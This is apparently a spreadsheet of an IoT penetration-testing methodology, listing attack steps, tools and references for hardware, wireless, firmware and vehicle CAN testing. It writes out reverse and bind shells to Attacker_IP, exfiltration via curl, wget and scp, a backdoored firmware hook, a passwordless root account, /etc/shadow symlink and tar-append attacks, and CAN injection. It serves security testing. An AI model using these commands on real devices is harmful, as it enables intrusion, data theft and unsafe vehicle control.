ii. Put power supply ON, pull up resistors ON, AUX high: W,P (v to view pin status)
iii. Enter 0x06 for Chip Enable: 6
iv. Enter command (0x03) to read data: [0xA0 Read_address_byte1(eg.0) Read_address_byte2(eg.0) 0x&lt;data,eg.AA&gt; 0x&lt;data,eg.BB&gt; 0x&lt;more_data&gt;]
v. For reading data, use command (0xA0) to set pointer to necessary address, enter command (0xA1) to write data: 
Command to set pointer to address: [0xA0 Read_address_byte1(eg.0) Read_address_byte2(eg.0)]
Command to write data: [0xA1 r:&lt;bytes_to_read(eg.2)&gt;]</t>
  </si>
  <si>
    <t>1. Connect Salae logic analyzer to pins of SPI/I2C flash memory pins:
a. SPI:
Connect pins of logic analyzer to SPI pins using following wiring (Logic Analyzer-SPI): CH1 - CS, CH2 - SCLK, CH3 - MOSI, CH4 - MISO, GND - GND
b. SPI:
Connect pins of logic analyzer to I2C pins using following wiring (Logic Analyzer-I2C): CH1 - SCL, CH2 - SDA, GND - GND
2. Set device name, baud rate (eg.9600/115200, etc.) in Logic Analyzer software. Set SPI/I2C in 'Analyzers' tab. (CH1 on logic analyzer device is channel 0 in logic analyzer software and so on)
3. Start minicom for the device (using UART, RS232, etc.)
4. Press start in logic analyzer software
5. In minicom, for login enter incorrect password
6. The incorrect password will be tested agains the correct password in the device. This analysis will be captured in the logic analyzer software. This data may be extracted (and cracked, if encoded/encrypted) to obtain the correct password</t>
  </si>
  <si>
    <t>Send CoAP GET request for /.well-known/core:
coap-client -m get coap://&lt;Server_domain/IP&gt;/.well-known/core</t>
  </si>
  <si>
    <t>Understand which commands are used to control units</t>
  </si>
  <si>
    <t>Backdoor - Bind</t>
  </si>
  <si>
    <t>Backdoor - Reverse</t>
  </si>
  <si>
    <t>Create backdoor by starting servers using netcat, telnet, SSH, etc.</t>
  </si>
  <si>
    <t>Make device connect to attacker-controlled server using telnet, python, etc.</t>
  </si>
  <si>
    <t>1. Salae Logic Analyzer
2. USB-UART adapter or
3. USB-RS232 adapter</t>
  </si>
  <si>
    <t>Data Exfiltration</t>
  </si>
  <si>
    <t>Exfiltrate data and files from device to outside</t>
  </si>
  <si>
    <t>https://highon.coffee/blog/reverse-shell-cheat-sheet/</t>
  </si>
  <si>
    <t>1. Connect to device using UART, RS232, SSH, telnet, etc.
2. Create bind shell using netcat (install binary in device if not pre-installed): nc -nvlp &lt;port,eg.80&gt;
3. If netcat cannot be installed in the device, run servers such as telnet, SSH, X11, VNC, etc. in the device. For example, telnet server may be started using:
a. telnetd -l/bin/sh or
b. /bin/busybox telnetd -l/bin/sh -p9999 (without root privileges on different port)
Other shells such as web shell (by creating web server on device, eg. using Apache), ICMP shell, msfvenom, etc. may also be used
4. Connect to device from within network (or from internet if device is publicly exposed with public IP) using telnet, SSH, etc.</t>
  </si>
  <si>
    <t>1. Connect to device using UART, RS232, SSH, telnet, etc.
2. Create listener in attacker-controlled server: nc -nvlp &lt;port,eg.80&gt;
2. Connect to attacker-controlled server (on required port, say 80) using tools such as bash, netcat, telnet, etc.
a. Bash script:
bash -i &gt;&amp; /dev/tcp/Attacker_IP/&lt;port,eg.80&gt; 0&gt;&amp;1
b. Netcat script:
nc -e /bin/sh Attacker_IP &lt;port,eg.80&gt;
c. telnet script:
telnet Attacker_IP &lt;port,eg.80&gt; | /bin/bash | telnet Attacker_IP 443</t>
  </si>
  <si>
    <t>https://www.pythonforbeginners.com/modules-in-python/how-to-use-simplehttpserver/
https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
https://superuser.com/questions/86043/linux-command-line-tool-for-uploading-files-over-http-as-multipart-form-data</t>
  </si>
  <si>
    <t>1. Connect to device using UART, RS232, SSH, telnet, etc.
2. Send data from device to attacker controlled server using methods such as:
a. Python HTTP Server
i. Create Simple HTTP web server using python. Command: python -m SimpleHTTPServer &lt;port,eg. 80&gt;
ii. Connect to device IP (using IP:port format) from attacker's machine's web browser (eg. Google Chrome) to download files
b. scp
i. Run SSH Daemon in attacker's machine
ii. scp file.txt remote_username@&lt;Attacker's IP, eg. 180.120.106.12&gt;:/remote/directory
c. curl
i. Create web server in attacker-controlled server listening to files to be uploaded
ii. curl -F ‘data=@path/to/file’ Attacker_server(eg.http://Attacker_domain/upload)
d. wget
i. Create web server in attacker-controlled server listening to files to be uploaded
ii. wget --header="Content-type: multipart/form-data boundary=FILEUPLOAD" --post-file postfile Attacker_server(eg.http://Attacker_domain/upload) (postfile must have postdata with boundaries using "FILEUPLOAD", in which file to be uploaded is specified - refer reference 3)
Other methods such as DNS data exfiltration, wget to upload file from device to server, etc. also may be used</t>
  </si>
  <si>
    <t>Device ID may be spoofed by changing the device ID used to authenticate into the IoT system. This may be done by (based on configuration):
1. Connect to device using UART, RS232, SSH, telnet, etc.
2. Attacker's custom device
a. Copy paste the entire firmware from device to attacker's custom device
b. If copying entire firmware is not possible, create essential settings in attacker's custom device, change device number in configuration file: 
i. Open config file using file editor - vim/nano device_properties.config
ii. Change device ID to one that is whitelisted in network
c. Copy the signature of the whitelisted device to the attacker's custom device
d. Use same algorithm and parameters in device used to calculate device ID
e. Perform MiTM attacks to change device ID while request is sent to server
3Second device from vendor
a. Change device number in configuration file: 
i. Open config file using file editor - vim/nano device_properties.config
ii. Change device ID/parameters/algorithms to one that is whitelisted in network
b. Change device number in binary through reverse engineering and modification:
i. Disassemble/ decompile the application binary using tools such as radare2, IDA, Hopper, etc.
ii. Modify the binary by changing the device ID to one that is whitelisted in the IoT system network
iii. Recompile the modified binary and replace device's binary with modified binary
c. Copy the file signature of the whitelisted device to the second device
d. Modify algorithm used to calculate device ID, in order to calculate same device ID (even with different parameters) as the one for the whitelisted device (Using reverse engineering or otherwise)
e. Perform MiTM attacks to change device ID while request is sent to server</t>
  </si>
  <si>
    <t>Obtaining root privileges (either directly or through privilege escalation) or having enough permissions to perform network-related tasks, following actions may be performed:
1. Turn off firewall in device
2. Change firewall/proxy IPs used by the device to attacker-controlled IPs by editing firewall/proxy configuration files
3. Edit firewall/proxy settings within device by editing firewall/proxy configuration files</t>
  </si>
  <si>
    <t>https://www.exploitee.rs/index.php/Wink_Hub%E2%80%8B%E2%80%8B
https://www.brettlischalk.com/posts/nand-glitching-wink-hub-for-root
https://www.youtube.com/watch?v=16-9BNDYxjY
https://www.youtube.com/watch?v=rXcvhAxFzOQ
https://www.youtube.com/watch?v=ErynYK9l41M</t>
  </si>
  <si>
    <t>1. Turn the device OFF
2. Connect to the device using UART, RS232, etc.
3. Turn ON the device
4. Within 1 or 2 seconds while the device is booting up, short the NAND I/O pin (eg.29 pin in Wink Hub) to GND pin (eg.metal casing in board). This may be done by connecting a wire, with one end touching GND and the other end touching the NAND I/O pin. A glitch will occur, causing the device to enter kernel panic mode (probably because it did not get the data from the I/O pin it was expecting but instead got a lot of '0's from GND) and eventually to a shell (not root shell).
5. Once this temporary shell is obtained, the 'kernel init bootloader' attack may be used to force the device to reboot with root privileges using /bin/sh. This may be done by setting init=/bin/sh in bootargs parameter using setenv command</t>
  </si>
  <si>
    <t>1. OS level commands such as 'echo', 'ls' etc. may be added to the input values in the input fields (eg. group name, password, etc.) in the display console attached to the device. This may be done by adding a delimiter, say a semicolon, to finish the actual command expected by the device and then add the malicious command the device did not expect.
2. Once it is confirmed that local command execution exists in the device, this may be exploited to start a telnet server in the device with root privileges on the device. Using this the device may be connected to with root privileges remotely (eg. by using telnet).</t>
  </si>
  <si>
    <t>https://www.exploitee.rs/index.php/Boxee</t>
  </si>
  <si>
    <t>1. Obtain the application binary of the GUI application running the display for the device from the device
2. Reverse engineer the binary using tools such as radare2, IDA, Hopper, etc.
3. Find input field points such as username, password, locations where device sends messages to the display console.
4. If the variable declaration, function declaration, etc. are vulnerable to buffer overflows (eg. use of size limited arrays such as a[60] for username, use of vulnerable functions such as strcpy which do not check buffer lengths, etc.) and an input may be set which exceeds the limit specified by the buffer for the variable and/or function, the application may be debugged in host system or on device to test where the pointer points to once the input crosses the buffer specified.
5. Once the buffer is crossed and buffer overflow is partly verified to exist, the return address may be appropriately set (by putting the input at the return address part as the address required) to point to a function (ROP gadgets) which may be used to execute commands (eg. system()). ROPgadget may be used to find available ROP gadgets in the binary.
6. A telnet server may be started in the device using this attack, so that the device may be connected to remotely with root privileges.</t>
  </si>
  <si>
    <t>1. radare2 or 
2. IDA or 
3. Hopper
4. ROPgadget</t>
  </si>
  <si>
    <t>coap-client</t>
  </si>
  <si>
    <t>1. Obtain the firmware binary (say firmware.bin) from device, online download, OTA sniffing, etc.
2. Use 'file' command to understand the type of file: file firmware.bin
2. Perform strings (or hexdump -C) on the binary to see all cleartext strings in the binary:
strings (or hexdump -C) firmware.bin
3. Analyze firmware using binwalk to find any compressed binaries which may be extracted:
binwalk firmware.bin
4. Extract fimware using binwalk:
binwalk -e firmware.bin (Extracted firmware is in folder _firmware.bin)
5. Go to _firmware.bin, find critical application binaries running the device (especially login binaries, binaries with input fields, password/card number comparing binaries, binaries with device commands, etc.)
6. Disassemble (use radare2, IDA, Hopper, etc.)/decompile (use dotPeek, dex2jar, etc.) the binary to obtain the assembly level/high level code</t>
  </si>
  <si>
    <t>1. From the disassembled/decompiled binary, understand the algorithm (as available) used to either:
a. create the keys for generating the licence or 
b. for checking the licence input to valid licence number
2. Create custom script to generate keys:
a. using the algorithm logic used to generate keys for the device and/or
b. using the licence check algorithm logic in the device so as to pass the licence check</t>
  </si>
  <si>
    <t>1. binwalk
2. radare2 or
3. IDA or
4. Hopper or
5 dotPeek or
6. dex2jar or</t>
  </si>
  <si>
    <t>http://manpages.ubuntu.com/manpages/cosmic/man5/coap-client.5.html</t>
  </si>
  <si>
    <t>https://www.hackingarticles.in/comprehensive-guide-on-hydra-a-brute-forcing-tool/
https://www.binarytides.com/crack-ftp-passwords-with-thc-hydra-tutorial/
https://www.rapid7.com/db/modules/auxiliary/scanner/ssh/ssh_enumusers
https://www.webopedia.com/TERM/A/anonymous_FTP.html</t>
  </si>
  <si>
    <t>1. Brute-force login to services such as MySQL, FTP, SSH, etc. either manually or using tools such as Hydra:
a. hydra -t &lt;threads&gt; -l &lt;username, eg.admin&gt; -P /path/to/passwords.txt -vV device_IP &lt;service, eg. mysql&gt;
(Password list may be generated using 'Mentalist' or using wordlists available (eg.rockyou.txt)
2. Brute-force username to SSH using username enumeration module for SSH in metasploit (ssh_enumusers)
3. Check for anonymous login (&lt;anonymous/ftp&gt;:&lt;no password&gt;) for FTP service</t>
  </si>
  <si>
    <t>1. Connect USB-UART adapter to device's UART pins:
a. RX of USB-UART adapter to TX of device's UART
b. TX of USB-UART adapter to RX of device's UART
c. GND of USB-UART adapter to GND of device's UART
2. Turn ON the device
3. Open PuTTY (in Windows) or screen/Minicom (in Linux).
4. Find device number of USB-UART adapter.
a. In Windows:
i. Open Device Manager
ii. Open Ports (COM &amp; LPT)
iii. Find serial port number (COMx) of USB-to-Serial port device
b. In Linux:
i. Run following command: dmesg | grep tty
ii. Find device number (ttySx) of USB-UART adapter)
5. Set required device number (COM or ttySx) and baud rate (obtained by guessing or through brute-force script) to gain serial access to device:
a. In PuTTY:
i. Select Serial in Session
ii. Enter COM port to which USB-UART adapter is connected
iii. Enter the baud rate
iv. Press Open
b. In screen:
Enter command screen /dev/device(eg.ttyS0) baud-rate(eg.115200)
c. In minicom:
minicom -b baud-rate(eg.115200) -o -D /dev/device(eg.ttyS0)
6. Identify any log messages and document them. Some log messages may be IPs and/or commands which may be used to interact with the device or with the server.</t>
  </si>
  <si>
    <t>http://www.devttys0.com/2012/07/hacking-the-linksys-wmb54g/</t>
  </si>
  <si>
    <t>Script upload</t>
  </si>
  <si>
    <t>Upload &amp; execute scripts (eg. to enable telnet) eg. through FTP</t>
  </si>
  <si>
    <t>1. Upload script/tool (eg.telnet, reverse/bind shell, etc.) using services such as FTP, TFTP, TFCP, etc.
2. Execute the script/tool either through vulnerabilities such as command injection/RCE, etc. or directly through direct/indirect connections such as UART, RS232, SSH, TELNET, etc.</t>
  </si>
  <si>
    <t>Create symlink to critical files in the device to read or modify its contents:
1. Read protected system file:
a. touch Attacker_file.xml
b. ln -s &lt;critical file, eg./etc/shadow&gt; Attacker_file.txt
c. cat Attacker_file.txt
2. Modify protected system file:
a. cp /etc/passwd /passwd
b. ln -s /passwd badpasswd
c. echo "new_data" &gt; badshadow (Overwrite data, use '&gt;&gt;' to append instead of overwrite)
d. cat /passwd</t>
  </si>
  <si>
    <t>Symlink attack</t>
  </si>
  <si>
    <t>Tar append attack</t>
  </si>
  <si>
    <t>Append tar file with modified system files to modify device system files</t>
  </si>
  <si>
    <t>Modify device's critical/system files by creating a tar appended with modified version of critical/system file. If the device has functionality to untar tar files in order to perform a firmware update, the malicious tar file will untar the modified tar and replace the original file in the device with the modified critical/system file. This may be performed as follows:
1. Create modified system file (eg./etc/shadow) in laptop:
a. cp /etc/shadow /shadow
b. vim /shadow
c. Create user with custom/no password and root privileges
2. Append the modified file to a tar file (maybe with other original firmware binaries/files):
a. tar vcf device_config.tar &lt;binary, eg.binary1&gt; &lt;config file, eg. config1.conf&gt;
b. tar -P --append --file=device_config.tar /shadow
c. Use device binary or device tar functionality to unpack the tar to modify the device firmware with new shadow file. This may create a new user with root privileges and custom/ no password known to the attacker.</t>
  </si>
  <si>
    <t>http://man7.org/linux/man-pages/man1/tar.1.html</t>
  </si>
  <si>
    <t>Enumerate GATT services and characteristics available on the BLE device:
1. Using GATTTool:
a. systemctl start bluetooth
b. hcitool hci0 up
c. node scan.js
d. Identify MAC address of BLE device to be tested
e. gatttool -b &lt;MAC Address&gt; -I hci0 -I
f. connect
g. characteristics
2. Using nRF Connect:
a. Scan for BLE devices in range
b. Identify and select the MAC address of the BLE device
c. Select 'Connect'
d. Services and characteristics will be shown in the app. Download button may be pressed for characteristics to read data for characteristics</t>
  </si>
  <si>
    <t>1. scan.js
2. gatttool or
3. nRF connect</t>
  </si>
  <si>
    <t>Read/ Write data</t>
  </si>
  <si>
    <t>https://github.com/pcborenstein/bluezDoc/wiki/hcitool-and-gatttool-example
https://www.oreilly.com/library/view/getting-started-with/9781491900550/ch04.html
https://devzone.nordicsemi.com/nordic/short-range-guides/b/bluetooth-low-energy/posts/ble-characteristics-a-beginners-tutorial</t>
  </si>
  <si>
    <t>Enumerate GATT services and characteristics available on the BLE device:
1. Using GATTTool:
a. gatttool -b &lt;MAC Address&gt; -I hci0 -I
b. connect
c. characteristics ('primary' command may be used to enumerate only primary characteristics)
d. Reading and writing may be performed on the characteristics for which they are assigned. These characteristics may be found by reading the 'char properties' value. Primitive list of properties are: 0x01 - Broadcast, 0x02 - Read, 0x04 - Write without response, 0x08 - Write, 0x10 - Notify, 0x20 - Indicate, 0x40 - Authenticated Signed Writes, 0x80 - Extended Properties
d. Read data: 
i. char-read-hnd &lt;char_value_handle, eg. 0x000c&gt; or
ii. char-read-uuid &lt;char_value_uuid, eg. f000aa11-0451-4000-b000-000000000000&gt; 
e. Writing data: char-write-req &lt;char_value_handle, eg. 0x000c&gt; &lt;data to be written, eg. 1234&gt;
2. Using nRF Connect:
a. Scan for BLE devices in range
b. Identify and select the MAC address of the BLE device
c. Select 'Connect'
d. Services and characteristics will be shown in the app. Download button may be pressed for characteristics to read data for characteristics</t>
  </si>
  <si>
    <t>https://resources.infosecinstitute.com/emulating-and-exploiting-firmware-binaries-offensive-iot-exploitation-series/</t>
  </si>
  <si>
    <t>1. Extract file system using binwalk (or otherwise):
binwalk -e firmware.bin
2. Read type of processor architecture (eg. ARM, MIPS, x86, etc.) used in the creation of the application binary using readelf:
a. readelf -h _firmware/path/to/application_binary (eg. _firmware/bin/busybox,ls,etc.)
b. In the output, "Machine" part will give architecture
3. Installing qemu will install all binaries required for cross-emulation (for all architectures). Using the required qemu binary, we are able to emulate the application binary in local machine. 
For this chroot has to be performed first to change the root directory to the root of the device file system. This creates a chroot jail, such that only binaries within root of device's file system (eg./bin) are allowed to be executed. 
Cross-emulation using qemu may be performed as follows:
a. Copy qemu binary to device's root: cp /path/to/&lt;qemu_binary, eg. qemu-mips-static&gt; /path/to/_firmware/
b. cd /path/to/_firmware/
c. chroot . ./&lt;qemu_binary, eg. qemu-mips-static&gt; ./path/to/application_binary(eg.busybox,ls,etc.)</t>
  </si>
  <si>
    <t xml:space="preserve">1. Use debuggers such as gdb to debug application binaries in the local system. This may be used to create breakpoints and to run through the code, modify register values, bypass login and licence checks, understand algorithms, etc.
Using gdb to perform debugging on application binary may be performed as follows:
a. Start gdb on binary: gdb application_binary
b. Disassemble function: disassemble &lt;function, eg. login&gt;
c. Set breakpoint: b &lt;line_number, eg.43 or function_name, eg. login or *address, eg. *0x0000805c&gt;
d. Run the code till breakpoint: run/r &lt;optional arguments&gt;
e. Step into next line of code: stepi/step/s
f. Execute next line of code: nexti/next/n
g. Contents of the stack may be viewed using backtrace: bt
h. Examine stack using x: x/&lt;Number of units+x,d,i,t,o,u,s,c+b,h,w,g eg.10i&gt; &lt;register or function eg. $pc login&gt;
i. Examine register values: info registers
j. Examine process map: info proc map
k. Continue until next breakpoint: continue/c
l. Continue to end of function: finish
m. Delete breakpoints: del &lt;breakpoint number, eg.2&gt;, delete (to delete all breakpoints)
n. Stop program execution: kill
o. gdb can be quit using 'quit' command: quit/q
2. Stack overflow attacks may be checked by inputting large values as input, examining the flow of program counter/instruction pointer and then modifying the return address to point to system executable function such as system() or other ROP gadgets (may be found using ROPGadget). Using this, the input value required, including the large padding in the beginning and the final address to point to (for Return address) may be identified and input in the actual device testing to obtain local/remote code execution
3. Registers may be changed to change return address or next address in order to bypass licence checks, register values may be changed to cause the application to perform unintended actions
</t>
  </si>
  <si>
    <t>https://cs.baylor.edu/~donahoo/tools/gdb/tutorial.html
https://azeria-labs.com/debugging-with-gdb-introduction/
https://azeria-labs.com/part-3-stack-overflow-challenges/
https://www.youtube.com/watch?v=HSlhY4Uy8SA&amp;list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&amp;index=15</t>
  </si>
  <si>
    <t>https://azeria-labs.com/debugging-with-gdb-introduction/
https://azeria-labs.com/part-3-stack-overflow-challenges/
https://www.youtube.com/watch?v=HSlhY4Uy8SA&amp;list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&amp;index=15</t>
  </si>
  <si>
    <t>Format string attacks</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=0WvrSfcdq1I&amp;t=407s</t>
  </si>
  <si>
    <t>1. Through debugging of the target application binary, if printf statement is being used, inject unintended parameters such as %x, %d, etc. in order to expose memory addresses and register values in the program (printf prints whatever is there in the stack in hex or decimal format)
2. Create payload using %n to manipulate data stored in memory. %n will write the number of data prepended to '%n' to the address specified on top of the stack during program execution. Since the arguments specified in the printf statement themseleves are added on to the stack, we are able to add padding along with the address to be modified as an argument to the printf statement. Once it is confirmed that the address we need to modify is indeed stored on top of the stack, we may then use %n to change the value of the address (Value will change to the number of characters before %n). (eg. ./application_binary "`python -c "print 'AAAA'*212 +'\x38\x96\x04\x08 (Address to change - Little Endian/Big Endian)'+'%n'"`"This may further be used to redirect code execution</t>
  </si>
  <si>
    <t>http://www.steves-internet-guide.com/mqtt-topic-payload-design-notes/
https://www.hivemq.com/blog/mqtt-essentials-part-4-mqtt-publish-subscribe-unsubscribe/
https://www.hivemq.com/blog/mqtt-essentials-part-5-mqtt-topics-best-practices/</t>
  </si>
  <si>
    <t>Connection to the MQTT broker may be made to subscribe and publish to topics (if authentication is required, credentials obtained from other methods may be used for authentication):
1. Subscribing:
mosquitto_sub -v -h &lt;broker URL/IP, eg.broker.device_web.com&gt; -p &lt;1883/8883&gt; -t &lt;topic, eg. light_status&gt;
mosquitto_sub -v -h &lt;broker URL/IP, eg.broker.device_web.com&gt; -p &lt;1883/8883&gt; -t ‘#’ (may not work with mosquitto)
mosquitto_sub -v -h &lt;broker URL/IP, eg.broker.device_web.com&gt; -p &lt;1883/8883&gt; -t ‘$SYS/#’ (Broker system information)
2. Publishing:
mosquitto_pub -h &lt;broker URL/IP, eg.broker.device_web.com&gt; -p &lt;1883/8883&gt; -t &lt;topic, eg. light_status&gt; -m &lt;message, eg. OFF&gt;
Messages from other publishers in the IoT system (eg. broker, light, fan, etc.) may be obtained by subscribing to the topic from the broker. The same messages (or modified messages) may be then published to the broker and to the subscribers in the IoT system, in order to operate these devices (eg. light, fan, etc.)</t>
  </si>
  <si>
    <t>1. Add user with root privileges by using adduser or useradd commands. The commands for adduser are as follows:
a. adduser -h /mnt/ramdisk -s(shell) /bin/sh -g(group) "" -H &lt;username&gt;
b. Enter custom password
Alternatively, the following command may be executed to add passwordless root user:
echo &lt;newusername&gt;::0:0:New user:/root:/bin/bash &gt;&gt; /etc/passwd
'su' command will drop straight to root
2. Change privileges of user in /etc/passwd:
a. vim /etc/passwd
b. Change UID:GID to 0:0 (from eg.1000:1000)</t>
  </si>
  <si>
    <t>Send CoAP GET/POST/PUT/DELETE requests to the server using the URIs obtained from .well-known/core:
1. GET
coap-client -m get coap://&lt;Server_domain/IP&gt;/URI
2. POST
coap-client -m post coap://&lt;Server_domain/IP&gt;/URI?&lt;optional parameters&gt;
3. PUT
coap-client -m put coap://&lt;Server_domain/IP&gt;/URI?&lt;optional parameters&gt;
4. DELETE
coap-client -m delete coap://&lt;Server_domain/IP&gt;/URI</t>
  </si>
  <si>
    <t>Decrypt Zigbee messages using key 'ZigbeeAlliance09':
1. Open Wireshark
2. Open pcap file containing Zigbee messages during pairing process
3. Go to Edit, Preference, Protocol, Zigbee
4. Open preconfigured, add 'ZigbeeAlliance09', save
5. Transport/Netwok key can now be obtained from the partially decrypted messages
6. Add this as well in preconfigured section to decrypt all packets
7. Using these two keys, opening Zigbee messages encrypted with these files, we are able to decrypt all packets</t>
  </si>
  <si>
    <t>1. Decrypt Zigbee messages using key 'ZigbeeAlliance09':
a. Open Wireshark
b. Open pcap file containing Zigbee messages during pairing process
c. Go to Edit, Preference, Protocol, Zigbee
d. Open preconfigured, add 'ZigbeeAlliance09', save
e. Transport/Netwok
2. Traverse through the Zigbee messages to obtain any API keys, passwords, IPs, commands, etc. which may be transmitted between the devices and may be used for their remote control/monitoring</t>
  </si>
  <si>
    <t>1. Plug in RZUSBStick to laptop
2. Enter command: sudo zbstumbler. Channel number is obtained from this
3. Use either zbdump or zbwireshark to capture Zigbee data packets:
a. zbdump:
i. Enter command: sudo zbdump -c &lt;channel number&gt; -w dump_output.dump
ii. Once enough packets are captured, capture may be stopped using Ctrl+C
b. zbwireshark:
i. sudo zbwireshark -c &lt;channel number&gt;
4. In order to replay the captured packets,
i. Open the captured packets in wireshark: sudo wireshark dump_output.dump
ii. Filter out the messages based on receiver's address
iii. Export required messages using 'export' (Export it to say message_capture.pcap)
iv. Using tools such as bless, vim, etc. on message_capture.pcap, we are able to manipulate the messages as well (Change only required parts, in order not to corrupt the packets)
v. Enter following command to send replay the packets: sudo zbreplay -c 12 -r message_capture.pcap -s &lt;delay, eg. .2&gt;</t>
  </si>
  <si>
    <t>CANTACT or 
TCU</t>
  </si>
  <si>
    <t>OBD adapter or
CANTACT or 
TCU</t>
  </si>
  <si>
    <t>cansniffer or
candump</t>
  </si>
  <si>
    <t>cansend</t>
  </si>
  <si>
    <t>1. Connect laptop to device connected to vehicle either through CAN port (eg. CANtact or TCU) (OBD port generally may not be used to send data into the vehicle - only used to get diagnostic data of vehicle
2. Replay commands using device ID and required value: cansend &lt;can_interface, eg. vcan0&gt; 188#020000
3. If it is not possible to use cansend but some other application/device may be used to send (eg. Mobile application linked to TCU, TCU device commands, etc.), these commands may be identified and the required parameters (eg. 188#020000) may be sent to control the vehicle</t>
  </si>
  <si>
    <t>1. Obtain CAN data either through OBD or CAN port, using tools such as CANtact (adapter to laptop) or TCU (Telematics Control Unit)
2. Enter command: cansniffer &lt;can_interface, eg. vcan0&gt; or candump &lt;can_interface, eg. vcan0&gt; (If it is not possible to use cansniffer, data may be obtained by connecting to TCU through UART/JTAG ports to obtain debug logs or from mobile/web application which may receive the data from the TCU)
3. Keep pressing one functionality in the vehicle (eg. Accelerate, Brake, Left/Right indicator, etc.) keeping most other functionalities fixed
4. Observe change in cansniffer data, showing the change in the particular parameter. 1st part will be the ID of the vehicle part while the 2nd part of the data is the actual value (eg. 188#020000 - 188 is ID of part, 020000 is value in hex)
5. Document mapping between the device part, functionality, part ID and value range. For truck data, SAE J1939 standard may be used to decode the data for device part, functionality, etc. since almost all trucks use the same standard, unlike cars which will have different mapping of CAN messages for each car manufacturer.</t>
  </si>
  <si>
    <t>Check entropy to know if firmware is encrypted or decompressed</t>
  </si>
  <si>
    <t>bless</t>
  </si>
  <si>
    <t>https://linuxhint.com/hex_editor_linux/
https://codeyarns.com/2014/12/29/bless/
https://resources.infosecinstitute.com/ida-program-patching/#gref
https://resources.infosecinstitute.com/applied-cracking-byte-patching-ida-pro/#gref
https://gist.github.com/Zeex/6607437
https://marcoramilli.com/2011/01/25/how-to-patch-binary-with-ida-pro/
https://resources.infosecinstitute.com/emulating-and-exploiting-firmware-binaries-offensive-iot-exploitation-series/
https://sh3llc0d3r.com/iot-backdooring-a-firmware/</t>
  </si>
  <si>
    <t>1. In one Virtual Machine execute following commands:
a. systemctl start bluetooth
b. hciconfig hci0 up
c. Scan for BLE device: node /path/to/scan.js
d. Capture packets used by BLE device: node /path/to/scan.js &lt;BLE_device_MAC - from step c.&gt; -o
e. Advertise MAC of BLE device: /path/to/mac_adv -a devices/&lt;BLE_device_saved_json_file.json&gt; -s devices/&lt;MAC&gt;.srv.json
2. In another Virtual Machine execute following commands: node /path/to/ws-slave.js
3. Executing commands in the mobile app/device should ideally be captured by the mac_adv. From this the commands used and their formats may be obtained.</t>
  </si>
  <si>
    <t>http://www.devttys0.com/2013/06/differentiate-encryption-from-compression-using-math/
https://github.com/ReFirmLabs/binwalk/wiki/Usage
https://www.basicinputoutput.com/2016/08/the-binwalk-firmware-analysis-tool.html</t>
  </si>
  <si>
    <t>Differentiate encryption from compression of firmware binary which has been obtained from some source (eg. Download from internet, flash memory, etc.). Encrypted data is typically a flat line with no variation, while compressed data will often have at least some variation. This may be done by performing the following steps:
1. Perform binwalk on file: binwalk firmware.bin (Output might show if data is compressed/ encrypted)
2. Perform binwalk signature and entropy scan on the file: 
a. Signature scan: binwalk -B firmware.bin
b. Entropy scan: binwalk -E &lt;--verbose&gt; firmware.bin</t>
  </si>
  <si>
    <t>Entropy</t>
  </si>
  <si>
    <t>binwalk</t>
  </si>
  <si>
    <t>1. Modify application binary:
a. Use bless (Other hex editors such as xxd, hexcurse, etc. also may be used) to change the hex values of the application binary: 
i. Enter following command to open application binary: bless
ii. Import application binary in bless: File&gt;Open&gt;application_binary
iii. Change endianness to little endian if application binary is compiled using Intel architecture: Check the little-endian option at the bottom
iv. Click on ASCII text or hex values, delete and enter new values
v. Save application binary: File&gt;Save
b. Use IDA patching to modify the firmware:
i. Select Edit&gt;Patch Program&gt;Change byte/Change word/Assemble (for changing byte - 16 bytes at a time - or word - 2 bytes at a time - or assembly instruction - 1 instruction at a time, instruction entered gets converted to hex values) (If 'Patch program' option is not available, edit idagui.cfg file and change DISPLAY_PATCH_SUBMENU configuration option to YES.
ii. Create DIF file: File&gt;Produce File&gt;Create DIF file 
iii. Create ida_patcher by compiling ida_patcher.c: gcc ida_patcher.c -o ida_patcher
iv. Create backup of original application binary (ida_patcher modifies original): cp application_binary application_binary_copy
v. Execute following command: ./ida_patcher -i application_binary -p application_binary.diff
2. Modify firmware file system:
a. Change the binaries/configuration files in the file system (Using tools such as bless, IDA Pro, vim, etc.)
b. Modify init scripts in /etc/init.d to execute modified binaries everytime during startup
c. Create modified firmware filesystem bin file using firmware-mod-kit:
i. Change any binary/configuration file using bless, vim, etc. in the extracted filesystem (extracted using binwalk, Firmware Mod Kit, etc.)
ii. Go to directory containing directory of extracted code
iii. Enter following command: ./build-firmware.sh firmware_directory -nopad -min
iv. New firmware is created in new-firmware.bin
(This method may be used to create a backdoor which creates a listening port when the device boots up, eg. by adding following command to any binary that automatically gets executed during bootup: nc –e /bin/sh &lt;Attacker's IP&gt; &lt;Port&gt; or mknod /tmp/backpipe p , /bin/sh 0&lt;/tmp/backpipe | nc &lt;Attacker’s IP&gt; &lt;port&gt; 1&gt;/tmp/backpipe)</t>
  </si>
  <si>
    <t>Decrypt encrypted firmware in order to extract and emulate it on laptop</t>
  </si>
  <si>
    <t>Stack buffer overflow:
1. Emulate and debug device firmware in laptop using tools such as gdb or gdb-multiarch
2. Find any vulnerable functions in the firmware that may be used to execute system commands.
3. Enter a large string as input
4. If segmentation fault occurs, find the value of instruction pointer (program counter). (This will mean that buffer overflow might be possible) 
5. Modify the string input to point the return address (last characters of string) to the required function in the firmware, which will allow for execution of system commands.
Command injection:
1. In input fields (eg. in the username/password/phone number entry) enter system commands (eg. ls, echo test), etc. to check if commands get executed</t>
  </si>
  <si>
    <t>gdb
gdb-multiarch
IDA Pro
r2
objdump
qemu</t>
  </si>
  <si>
    <t>http://www.devttys0.com/2014/02/cracking-linksys-crypto/</t>
  </si>
  <si>
    <t>https://www.whitelist1.com/2017/05/10-buffer-overflow-exploitation-on-mips.html
https://www.youtube.com/watch?v=8QzOC8HfOqU&amp;list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&amp;index=14
https://www.exploitee.rs/index.php/DMP-BDT230%E2%80%8B%E2%80%8B</t>
  </si>
  <si>
    <t>Decrypt firmware using vulnerable encryption algorithm or any available encryption keys.
Eg. For XOR based encryption:
1. Each character is encrypted to the same value regardless of its position
2. XORing the character with the value will give the XOR key
3. XORing all characters with the XOR key obtained from step 2 will enable us to decrypt the entire firmware</t>
  </si>
  <si>
    <t>Decrypt configuration files</t>
  </si>
  <si>
    <t>Deobfuscate firmware</t>
  </si>
  <si>
